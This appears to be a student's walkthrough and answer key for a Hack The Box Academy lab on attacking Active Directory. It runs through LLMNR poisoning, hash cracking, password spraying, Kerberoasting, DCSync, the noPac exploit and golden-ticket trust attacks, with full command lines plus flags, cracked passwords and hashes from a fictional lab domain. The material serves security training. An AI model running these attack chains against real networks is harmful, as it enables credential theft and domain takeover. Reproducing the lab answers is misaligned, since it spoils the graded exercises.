Active Directory Enumeration & Attacks
External Recon and Enumeration Principles
Q1) While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} )
nslookup -type=TXT inlanefreight.com
Answer: HTB{5Fz6UPNUFFzqjdg0AzXyxCjMZ}
Initial Enumeration of the Domain
Identifying Hosts
Let's begin by monitoring the network to gain insight into current activity. Using tools like Wireshark and TCPDump, we can analyze the traffic and identify active hosts and the types of communications occurring across the network.
sudo -E wireshark # Using Wireshark
sudo tcpdump -i ens224 # Using Tcpdump
Starting Responder
Responder is a tool built to listen, analyze, and poison LLMNR, NBT-NS, and MDNS requests and responses.
sudo responder -I ens224 -A 
FPing Active Checks
fping -asgq 172.16.5.0/23
Kerbrute - Internal AD Username Enumeration
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jjsmith.txt -o valid_ad_users
Q1) From your scans, what is the "commonName" of host 172.16.5.5 ?
sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum
Answer: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Q2) What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name)
sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum
Answer: 172.16.5.130
LLMNR/NBT-NS Poisoning - from Linux
Q1) Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.
sudo responder -I ens224 
Answer: backupagent
Q2) Crack the hash for the previous account and submit the cleartext password as your answer.
sudo hashcat -m 5600 backupagent_NTLMv2 /usr/share/wordlists/rockyou.txt
Answer: h1backup55
Q3) Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.
sudo hashcat -m 5600 wley_NTLMv2 /usr/share/wordlists/rockyou.txt
Answer: transporter@4
LLMNR/NBT-NS Poisoning - from Windows
Using Inveigh
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
C# Inveigh (InveighZero)
.\Inveigh.exe
Q1) Run Inveigh and capture the NTLMv2 hash for the svc_qualys account. Crack and submit the cleartext password as the answer.
.\Inveigh.exe
GET NTLMV2UNIQUE
sudo hashcat -m 5600 svc_qualys /usr/share/wordlists/rockyou.txt
Answer: security#1
Enumerating & Retrieving Password Policies
Enumerating the Password Policy - from Linux - Credentialed
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
SMB NULL Sessions
rpcclient -U "" -N 172.16.5.5
getdompwinfo
Using enum4linux
enum4linux -P 172.16.5.5
Using enum4linux-ng
enum4linux-ng -P 172.16.5.5 -oA ilfreight
Enumerating the Password Policy - from Linux - LDAP Anonymous Bind
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
Enumerating the Password Policy - from Windows
net use \\DC01\ipc$ "" /u:""
net accounts
Get-DomainPolicy # From PowerviewQ1) What is the default Minimum password length when a new domain is created? (One number)
Answer: 7
Q2) What is the minPwdLength set to in the INLANEFREIGHT.LOCAL domain? (One number)
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
Answer: 8
Password Spraying - Making a Target User List
SMB NULL Session to Pull User List
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Using rpcclient
rpcclient -U "" -N 172.16.5.5
Using CrackMapExec --users Flag
crackmapexec smb 172.16.5.5 --users
Gathering Users with LDAP Anonymous
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
Q1) Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 
Answer: 56
Internal Password Spraying - from Linux
Using a Bash one-liner for the Attack
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Using Kerbrute for the Attack
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
Using CrackMapExec & Filtering Logon Failures
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
Validating the Credentials with CrackMapExec
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
Local Admin Spraying with CrackMapExec
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain.
Q1) Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.
for u in $(cat valid_usernames.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
sudo crackmapexec smb 172.16.5.5 -u sgage -p Welcome1
Answer: sgage
Internal Password Spraying - from Windows
Q1) Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.
Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
Answer: dbranch
Enumerating Security Controls
Checking the Status of Defender with Get-MpComputerStatus
Get-MpComputerStatus
Using Get-AppLockerPolicy cmdlet
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionsEnumerating Language Mode
$ExecutionContext.SessionState.LanguageMode
LAPS
The Microsoft Local Administrator Password Solution (LAPS) is used to randomize and rotate local administrator passwords on Windows hosts and prevent lateral movement.
Enumerating LAPS
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputersCredentialed Enumeration - from Linux
CME - Domain User Enumeration
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users
CME - Domain Group Enumeration
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
CME - Logged On Users
sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users
CME Share Searching
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares
Spider_plus
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
SMBMap To Check Access
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
Recursive List Of All Directories
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only
SMB NULL Session with rpcclient
rpcclient -U "" -N 172.16.5.5RPCClient User Enumeration By RID
queryuser 0x457
Enumdomusers
enumdomusers
Impacket Toolkit
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da # Windapsearch - Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU # Windapsearch - Privileged UsersBloodhound.py
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all Q1) What AD User has a RID equal to Decimal 1170?
Let's begin by converting this number from decimal to hexadecimal.
queryuser 0x492
Answer: mmorgan
Q2) What is the membercount: of the "Interns" group?
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep -i "interns"
Credentialed Enumeration - from Windows
Get Domain Info
Import-Module ActiveDirectory
Get-ADDomain
Get-ADUser
Checking For Trust Relationships
Get-ADTrust -Filter *
Group Enumeration
Get-ADGroup -Filter * | select name
Detailed Group Info
Get-ADGroup -Identity "Backup Operators"
PowerView
Command
Description
Export-PowerViewCSV
Append results to a CSV file
ConvertTo-SID
Convert a User or group name to its SID value
Get-DomainSPNTicket
Requests the Kerberos ticket for a specified Service Principal Name (SPN) account
Domain/LDAP Functions:
Get-Domain
Will return the AD object for the current (or specified) domain
Get-DomainController
Return a list of the Domain Controllers for the specified domain
Get-DomainUser
Will return all users or specific user objects in AD
Get-DomainComputer
Will return all computers or specific computer objects in AD
Get-DomainGroup
Will return all groups or specific group objects in AD
Get-DomainOU
Search for all or specific OU objects in AD
Find-InterestingDomainAcl
Finds object ACLs in the domain with modification rights set to non-built in objects
Get-DomainGroupMember
Will return the members of a specific domain group
Get-DomainFileServer
Returns a list of servers likely functioning as file servers
Get-DomainDFSShare
Returns a list of all distributed file systems for the current (or specified) domain
GPO Functions:
Get-DomainGPO
Will return all GPOs or specific GPO objects in AD
Get-DomainPolicy
Returns the default domain policy or the domain controller policy for the current domain
Computer Enumeration Functions:
Get-NetLocalGroup
Enumerates local groups on the local or a remote machine
Get-NetLocalGroupMember
Enumerates members of a specific local group
Get-NetShare
Returns open shares on the local (or a remote) machine
Get-NetSession
Will return session information for the local (or a remote) machine
Test-AdminAccess
Tests if the current user has administrative access to the local (or a remote) machine
Threaded 'Meta'-Functions:
Find-DomainUserLocation
Finds machines where specific users are logged in
Find-DomainShare
Finds reachable shares on domain machines
Find-InterestingDomainShareFile
Searches for files matching specific criteria on readable shares in the domain
Find-LocalAdminAccess
Find machines on the local domain where the current user has local administrator access
Domain Trust Functions:
Get-DomainTrust
Returns domain trusts for the current domain or a specified domain
Get-ForestTrust
Returns all forest trusts for the current forest or a specified forest
Get-DomainForeignUser
Enumerates users who are in groups outside of the user's domain
Get-DomainForeignGroupMember
Enumerates groups with users outside of the group's domain and returns each foreign member
Get-DomainTrustMapping
Will enumerate all trusts for the current domain and any others seen.
Domain User Information
Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
Recursive Group Membership
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Trust Enumeration
Get-DomainTrustMapping
Testing for Local Admin Access
Test-AdminAccess -ComputerName ACADEMY-EA-MS01
Finding Users With SPN Set
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
SharpView
Here we can use SharpView to enumerate information about a specific user, such as the user forend, which we control.
.\SharpView.exe Get-DomainUser -Identity forend
Snaffler
Snaffler is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
Q1) Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain.
Import-Module .\PowerView.ps1
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Q2) What PowerView function allows us to test if a user has administrative access to a local or remote host?
Test-AdminAccess -ComputerName ACADEMY-EA-MS01
Answer: Test-AdminAccess
Q3) Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
Answer: sa
Q4) What is the password for the database user?
Answer: ILFREIGHTDB01!
Living Off the Land
Q1) Enumerate the host's security configuration information and provide its AMProductVersion.
Get-MpComputerStatus
Q2) What domain user is explicitly listed as a member of the local Administrators group on the target host?
net localgroup administrators
Answer: adunn
Q3) Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" -attr distinguishedName userAccountControl,
description
Answer: HTB{LD@P_I$_W1ld}
Kerberoasting - from Linux
Q1) Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user SAPService
hashcat -m 13100 SAPService /usr/share/wordlists/rockyou.txt
Answer: !SapperFi2
Q2) What powerful local group on the Domain Controller is the SAPService user a member of?
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/SAPService | grep 'SAPService'
Answer: Account Operators
Kerberoasting - from Windows
Q1) What is the name of the service account with the SPN 'vmware/inlanefreight.local'?
Get-DomainUser * -spn | select samaccountname
Answer: svc_vmwaresso
Q2) Crack the password for this account and submit it as your answer.
.\Rubeus.exe kerberoast /user:svc_vmwaresso /nowrap
hashcat -m 13100 svc_vm_tgs /usr/share/wordlists/rockyou.txt
Answer: Virtual01
Access Control List (ACL) Abuse Primer
Q1) What type of ACL defines which security principals are granted or denied access to an object? (one word)
Answer: DACL
Q2) Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?
Answer: GenericAll
ACL Enumeration
Q1) What is the rights GUID for User-Force-Change-Password?
$sid = Convert-NameToSid wley
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
$sid = Convert-NameToSid wley
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Or from here: https://learn.microsoft.com/en-us/windows/win32/adschema/r-user-force-change-password
Answer: 00299570-246d-11d0-a768-00aa006e0529
Q2) What flag can we use with PowerView to show us the ObjectAceType in a human-readable format during our enumeration?
Answer: ResolveGUIDs
Q3) What privileges does the user damundsen have over the Help Desk Level 1 group?
$sid2 = Convert-NameToSid damundsen
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
Answer: GenericWrite
Q4) Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne).
$sid2 = Convert-NameToSid forend
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2}
Answer: GenericAll
Q5) What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
.\SharpHound.exe -c All --zipfilename ILFREIGHT
Next, let's upload this ZIP file to the BloodHound GUI for analysis.
I selected FOREND@INLANEFREIGHT.LOCAL as the starting node. Then, from the Node Info tab, I scrolled down to the Outbound Control Rights section, followed by First Degree Object Control.
Answer: Self-Membership
ACL Abuse Tactics
Q1) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
Given that we have GenericAll permissions on this account, we can conduct a targeted Kerberoasting attack by modifying the account's servicePrincipalName (SPN) attribute to register a fake SPN. This will allow us to request a Ticket Granting Service (TGS) ticket, which we can then extract and attempt to crack offline using Hashcat.
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
.\Rubeus.exe kerberoast /user:adunn /nowrap
Let's save this TGS to a file and attempt to crack it using Hashcat.
hashcat -m 13100 adunn_TGS /usr/share/wordlists/rockyou.txt
Answer: SyncMaster757
DCSync
Q1) Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer.
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
Answer: syncron
Q2) What is this user's cleartext password?
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 
Answer: Mycleart3xtP@ss!
Q3) Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.
secretsdump.py -outputfile inlanefreight_hashes -just-dc-user khartsfield INLANEFREIGHT/adunn@172.16.5.5 
Answer: 4bb3b317845f0954200a6b0acc9b9f9a
Privileged Access
Q1) What other user in the domain has CanPSRemote rights to a host?
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
Answer: bdavis
Q2) What host can this user access via WinRM? (just the computer name)
Answer: ACADEMY-EA-DC01
Q3) Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
Answer: 1m_the_sQl_@dm1n_n0w!
Bleeding Edge Vulnerabilities
Q1) Which two CVEs indicate NoPac.py may work? (Format: ####-#####&####-#####, no spaces)
Answer: 2021-42278&2021-42287
Q2) Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop.
First, let's determine whether the system is vulnerable.
sudo python3 /opt/noPac/scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
Next, we will attempt to obtain a shell with SYSTEM-level privileges by executing noPac.py. This tool allows us to impersonate the built-in Administrator account and initiate a semi-interactive shell session on the target Domain Controller.
sudo python3 /opt/noPac/noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
Answer: D0ntSl@ckonN0P@c!
Miscellaneous Misconfigurations
Q1) Find another user with the passwd_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Answer: ygroce
Q2) Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.
First, let's find the user that do not require pre authentiation.
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Next, let's retrieve the AS-REP in the proper format for offline hash cracking.
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
Answer: Pass@word
Domain Trusts Primer
Q1) What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)
Import-Module ActiveDirectory
Get-ADTrust -Filter *
Answer: LOGISTICS.INLANEFREIGHT.LOCAL
Q2) What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?
Answer: FREIGHTLOGISTICS.LOCAL
Q3) What direction is this trust?
Answer: Bidirectional
Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Q1) What is the SID of the child domain?
Import-Module .\PowerView.ps1
Get-DomainSID
Answer: S-1-5-21-2806153819-209893948-922872689
Q2) What is the SID of the Enterprise Admins group in the root domain?
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Answer: S-1-5-21-3842939050-3880317879-2865463114-519
Q3) Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.
First, let's retrieve the hash of the krbtgt account.
.\mimikatz.exe
lsadump::dcsync /user:LOGISTICS\krbtgt
We now have the krbtgt hash, the SID of the Enterprise Admins group, and the SID of the child domain, which enables us to create a Golden Ticket.
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
Now we can get the flag
cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt
Answer: f@ll1ng_l1k3_d0m1no3$
Attacking Domain Trusts - Child -> Parent Trusts - from Linux
Q1) Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
First, let's retrieve the hash of the krbtgt account.
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
Next, we need to get the SID of the child domain
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 
Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5 and grab the domain SID .
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
Next, we can use ticketer.py from the Impacket toolkit to generate a Golden Ticket, which grants access to resources in both the child and parent domains.
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
The ticket will be stored in our system as a credential cache (ccache) file, which holds Kerberos credentials. By setting the KRB5CCNAME environment variable, the system is directed to use this file for Kerberos authentication.
export KRB5CCNAME=hacker.ccache 
Now, we need to check if we can successfully authenticate to the parent domain's Domain Controller.
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
Impacket also has the tool raiseChild.py, which will automate escalating from child to parent domain.
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
Let's retrieve the NTLM hash for the domain administrator account, bross.
secretsdump.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 | grep "bross"
Answer: 49a074a39dd0651f647e765c2cc794c7
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
Q1) Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. Crack the ticket and submit the account's cleartext password as your answer.
We can use PowerView to enumerate accounts within the target domain that have associated Service Principal Names (SPNs).
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
Let's perform a Kerberoasting attack across the trust using Rubeus.
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.
hashcat -m 13100 mssqlsvc_tgs /usr/share/wordlists/rockyou.txt
Answer: 1logistics
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
Q1) Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc.
We have obtained the password for the user account wley before, which is transporter@4.
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Answer: sapsso
Q2) Crack the TGS and submit the cleartext password as your answer.
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
hashcat -m 13100 sapsso_tgs /usr/share/wordlists/rockyou.txt
Answer: pabloPICASSO
Q3) Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
psexec.py ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/sapsso:pabloPICASSO@172.16.5.238
Answer: burn1ng_d0wn_th3_f0rest!
Last updated